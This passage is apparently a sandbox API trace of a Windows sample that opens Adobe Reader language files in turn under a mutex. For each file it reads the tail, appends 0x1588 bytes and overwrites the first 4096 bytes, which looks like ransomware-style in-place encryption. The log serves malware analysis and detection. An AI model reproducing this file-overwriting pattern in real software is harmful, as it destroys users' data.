lpMultiByteStr="DisplayLanguageNames.es.txt", lpUsedDefaultChar=0x0) returned 27 [0098.095] ReadFile (in: hFile=0x1e4, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.097] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5ec4 [0098.097] ReadFile (in: hFile=0x1e4, lpBuffer=0x2866a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2866a88*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.098] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5ec4 [0098.098] WriteFile (in: hFile=0x1e4, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0098.099] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0098.099] WriteFile (in: hFile=0x1e4, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0098.099] CloseHandle (hObject=0x1e4) returned 1 [0098.099] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_ES.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_es.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0098.100] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0098.100] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x6ec0 [0098.100] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0098.100] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0098.100] ReleaseMutex (hMutex=0x168) returned 1 [0098.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_ES.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0098.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_ES.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.es_ES.txt", lpUsedDefaultChar=0x0) returned 30 [0098.100] ReadFile (in: hFile=0x1e4, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.102] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5ec0 [0098.102] ReadFile (in: hFile=0x1e4, lpBuffer=0x2866a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2866a88*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.103] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5ec0 [0098.103] WriteFile (in: hFile=0x1e4, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0098.104] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0098.104] WriteFile (in: hFile=0x1e4, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0098.104] CloseHandle (hObject=0x1e4) returned 1 [0098.104] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PR.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_pr.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0098.105] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0098.105] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x6ec8 [0098.105] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0098.105] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0098.105] ReleaseMutex (hMutex=0x168) returned 1 [0098.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_PR.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0098.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_PR.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.es_PR.txt", lpUsedDefaultChar=0x0) returned 30 [0098.106] ReadFile (in: hFile=0x1e4, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.107] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5ec8 [0098.107] ReadFile (in: hFile=0x1e4, lpBuffer=0x2866a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2866a88*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.108] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5ec8 [0098.108] WriteFile (in: hFile=0x1e4, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0098.109] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0098.109] WriteFile (in: hFile=0x1e4, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0098.110] CloseHandle (hObject=0x1e4) returned 1 [0098.110] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.et_EE.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.et_ee.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0098.111] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0098.111] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x6b5e [0098.111] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0098.111] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0098.112] ReleaseMutex (hMutex=0x168) returned 1 [0098.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.et_EE.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0098.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.et_EE.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.et_EE.txt", lpUsedDefaultChar=0x0) returned 30 [0098.112] ReadFile (in: hFile=0x1e4, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.424] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5b5e [0099.424] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.432] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5b5e [0099.432] WriteFile (in: hFile=0x1e4, lpBuffer=0x2865a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.433] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0099.433] WriteFile (in: hFile=0x1e4, lpBuffer=0x2865a88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.433] CloseHandle (hObject=0x1e4) returned 1 [0099.433] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.he_IL.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.he_il.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0099.434] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0099.434] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x67c2 [0099.434] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0099.434] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.434] ReleaseMutex (hMutex=0x168) returned 1 [0099.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.he_IL.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0099.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.he_IL.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.he_IL.txt", lpUsedDefaultChar=0x0) returned 30 [0099.435] ReadFile (in: hFile=0x1e4, lpBuffer=0x2865a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.436] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x57c2 [0099.437] ReadFile (in: hFile=0x1e4, lpBuffer=0x2865a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.440] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x57c2 [0099.441] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ea5988*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5988*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.441] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0099.441] WriteFile (in: hFile=0x1e4, lpBuffer=0x2865a88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.441] CloseHandle (hObject=0x1e4) returned 1 [0099.441] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it_IT_PREEURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.it_it_preeuro.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0099.442] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0099.442] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x6e8e [0099.442] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0099.442] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.442] ReleaseMutex (hMutex=0x168) returned 1 [0099.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.it_IT_PREEURO.txt", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0099.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.it_IT_PREEURO.txt", cchWideChar=38, lpMultiByteStr=0x1fa55f4, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.it_IT_PREEURO.txt", lpUsedDefaultChar=0x0) returned 38 [0099.442] ReadFile (in: hFile=0x1e4, lpBuffer=0x2865a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.444] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5e8e [0099.444] ReadFile (in: hFile=0x1e4, lpBuffer=0x2865a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.449] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5e8e [0099.449] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ea5988*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5988*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.449] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0099.449] WriteFile (in: hFile=0x1e4, lpBuffer=0x2865a88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.449] CloseHandle (hObject=0x1e4) returned 1 [0099.450] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lv.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.lv.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0099.450] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0099.450] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x6aae [0099.450] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0099.450] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.450] ReleaseMutex (hMutex=0x168) returned 1 [0099.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.lv.txt", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0099.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.lv.txt", cchWideChar=27, lpMultiByteStr=0x1f8fd5c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.lv.txt", lpUsedDefaultChar=0x0) returned 27 [0099.451] ReadFile (in: hFile=0x1e4, lpBuffer=0x2865a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.453] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5aae [0099.453] ReadFile (in: hFile=0x1e4, lpBuffer=0x2865a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.457] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5aae [0099.457] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ea5988*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5988*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.458] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0099.458] WriteFile (in: hFile=0x1e4, lpBuffer=0x2865a88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.458] CloseHandle (hObject=0x1e4) returned 1 [0099.458] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_NL_PREEURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl_nl_preeuro.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0099.458] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0099.458] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x6dd6 [0099.459] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0099.459] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.459] ReleaseMutex (hMutex=0x168) returned 1 [0099.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.nl_NL_PREEURO.txt", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0099.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.nl_NL_PREEURO.txt", cchWideChar=38, lpMultiByteStr=0x1fa55f4, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.nl_NL_PREEURO.txt", lpUsedDefaultChar=0x0) returned 38 [0099.459] ReadFile (in: hFile=0x1e4, lpBuffer=0x2865a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.460] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5dd6 [0099.460] ReadFile (in: hFile=0x1e4, lpBuffer=0x2865a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.464] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5dd6 [0099.465] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ea5988*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5988*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.465] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0099.465] WriteFile (in: hFile=0x1e4, lpBuffer=0x2865a88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.465] CloseHandle (hObject=0x1e4) returned 1 [0099.466] CreateFileW (lpFileName="C:\\Program Files 